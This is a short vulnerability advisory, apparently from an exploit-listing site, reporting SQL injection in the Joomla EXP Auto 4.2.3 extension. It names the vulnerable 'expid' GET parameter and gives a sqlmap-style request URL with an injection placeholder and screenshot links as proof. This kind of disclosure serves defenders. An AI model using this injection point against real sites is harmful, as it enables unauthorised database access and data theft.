Joomla EXP Auto 4.2.3 SQL Injection

2018.01.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################ #Title: Joomla EXP Auto 4.2.3 - SQL Injection #Credit: Bilal KARDADOU #Vendor: http://www.feellove.eu/ #URL: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/exp-auto/ #Product: 'Joomla EXP Auto 4.2.3' #Developer: Grusha #Extension type: Plugin #Last updated: Aug 10 2017 #Compatibility: 3.X #Type: Paid download #Google Dork: N/A ################################################ # # Description: # EXP Autos - it's the only component that when you change categories, changes Makes,Models,Bodytypes,Equipments etc. # For example you are selling cars and trucks, cars and trucks have different Makes (funny to see in trucks Aston Martin, Audi etc.), different Models, different Bodytype(funny to see in trucks - sedan etc.), different Equipments etc. # # --Method=GET -p [expid] # # -u " http://127.0.0.1/joomla/en/vehicles/passenger-cars/used-cars-makes/index.php?option=com_expautospro&view=expmake&format=ajax&tmpl=component&task=expshortlist&expval=1&expid=210[SQLI]&lang=en " # PoC: # https://prnt.sc/hvkh7d # https://prnt.sc/hvkhf7 # # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top